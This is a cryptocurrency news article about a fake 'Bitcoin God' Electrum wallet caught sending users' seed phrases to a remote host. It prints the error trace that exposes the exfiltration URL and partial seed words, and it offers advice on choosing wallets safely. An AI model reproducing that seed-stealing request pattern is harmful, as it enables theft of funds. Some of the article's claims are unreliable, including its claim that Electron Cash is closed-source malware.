Reddit User Caught Bitcoin God Wallet Stealing Bitcoin Keys From Electrum

Reddit User Caught Bitcoin God Wallet Stealing Bitcoin Keys From Electrum

According to his post, Reddit user mimblezimble discovered that if you download the Bitcoin God (GOD) wallet featured on electrumgod.org, it may try to steal your bitcoin (BTC) by transmitting away your Electrum wallet’s SEED phrase. Be careful of the bitcoin GOD wallet.

Also read: The Three Watershed Moments in Crypto in 2018–And No, They’re Not What You Might Think

Subscribe to the Bitsonline YouTube channel for great videos featuring industry insiders & experts

Electrum God Wallet Has Build-In Devil Script That Steals Coins

Mimblezimble caught the electrumgod wallet red-handing trying to steal bitcoin keys. The user was smart enough not to install the malware on his main machine and used a virtual one instead. Before installing the Electrum God wallet, the user had disconnected the network adapter, leaving the hardware without access to the internet, also a smart move.

However, while installing, the wallet terminated with the following python error:

urllib3.exceptions.MaxRetryError:
HTTPConnectionPool(host='ethereumdark.io',
port=80): Max retries exceeded with url:
/electrum/seeds.php?seed=
wife+scar + free+royal+...+grey
(Caused by NewConnectionError('<urllib3.connection.HTTPConnection
object at 0x7fafcf62cb38>: Failed to establish a new connection:
[Errno -2] Name or service not known',))

As the post says, “it immediately tried to reach the ethereumdark.io site with a view on transmitting the electrum seed to the /electrum/seeds.php?seed={seed} script.”

Mimblezimble shares the information on how to reproduce the theft attempt on VM with an empty Electrum seed to see what happens:

REMARK: This should remind you that whatever else you do, you should NEVER allow the secrets to touch the network.

That is why it is so important to export unsigned transaction to the network-disconnected signer (virtual) machine, sign the transaction there, and import the signed transaction back to the network-connected viewer (virtual) machine.

In that case, even if the wallet is subverted, corrupted, or infected, it will not be able to steal your secrets.”

The God of Theft Hits Electrum’s Reputation Again

The Electrum wallet is just so perfect. But different wallets are now exploiting its reputation to drag newbies to their bad software. They also count on careless users who won’t protect their “wallet” files in Electrum’s hidden sysfolder.

God

For example, there is an “Electron Cash wallet” for BCH that is closed source and has a signature of a mysterious troll, Jonald Fyokball. This wallet, once installed and launched, tries to swipe all the “wallet” files that are stored in the original Electrum’s system folder.

Obviously, this means that the wallet wants your private keys, and it is confirmed that it uses the password you set for BCH to try and unlock your BTC from the other wallet (wise scheme, but not perfect).

There’s also a fresh scheme targeting Electrum and Electron Cash wallets that uses command and control attacks and malicious Electrum servers to send a fake security update alert to Windows wallet users. If you press a malicious link from the alert, the virus file will steal bitcoin from Electrum or Electron Cash.

Take a look at the “Electrum Litecoin Wallet”, which is closed source and is not related to the original Electrum creators. The only real Electrum wallet is dedicated to bitcoin only, and can be downloaded from the electrum.org official website.

It has Thomas Voegtlin’s signature–he is a respected figure and the author of Electrum.

God
A wallet for BITCOIN GOD. Which means – for you, of course.

Only Trust Established Or Hardware Wallets

When a new token arrives on the market, you try to download and use one of the easiest wallets. Sometimes they’re open source, which is great, and sometimes closed source. This is where problems start.

If the wallet is open source and doesn’t steal your coins, it may still be too new to be fully peer-reviewed. This may mean even more problems for users. Anyway, in most cases, a freshly backed wallet will try to steal your bitcoin, and this is much worse than something like, for example, Copay’s BCH weird address formats or Coinbase’s “bitcoin confiscability” feature. Do not trust online wallets, and if you want ultra tight privkeys security, consider buying a CoolWallet S, TREZOR, OpenDime, Ledger, or KeepKey.

A Few Hints For Crypto Users

You may have noticed that the user Mimblezimble has exposed a few of the words from his original seed:

God

This was a very bad move for him if coins are still on that seed. Because, the way he posted the python script code reveals the first word of his seed, then the last one, and a couple of others in between.

It is technically possible for a good coder to write and use a special script that facilitates the database of 6500 ‘Electrum seed’ words to pick the correct seed using the given words.

If this user has his coins on another seed right now, then everything is OK. Just in case, Bitsonline has already reached out to the man and asked him to hide his seed words or move the coins away from the old seed.

Anyway, when downloading a new wallet, just check:

  • Open or closed source? If closed, then why?
  • Who is the author of the software? Is it a trusted developer, or some unknown guy from Nowhere Village?
  • Are there any peers and are there reviews on GitHub?
  • How much time did it take to deliver the software and what is its business model?
  • Does it come from core developers or from a separate or private entity?
  • How to launch this software outside of Windows PC?
  • How many reviews and feedback has the wallet collected across the network?
  • Are there any supportive links to Twitter, FB, YT, Medium, or similar sites with educational content?

Pay Attention To The Official Page

Don’t forget to briefly visit the wallet’s website. It must have links to GitHub, social profiles, telegram chat rooms, and even the emails with full names of software authors. Wallet developers often avoid staying anonymous.

Also check the “Creation date” parameter for the wallet’s official domain page via the Whois service. If the domain name was registered a month ago, and the hard fork happened three days before that, the wallet isn’t worth installing.

Keep your bitcoin safe and do not install untested software, even from the Google Play Market or Apple App Store. They have publish untested software too.

Share your experience using the Electrum wallet or its clones. How it was? Leave us tips and questions in the comments section below.


Images by Jeff Fawkes

Related News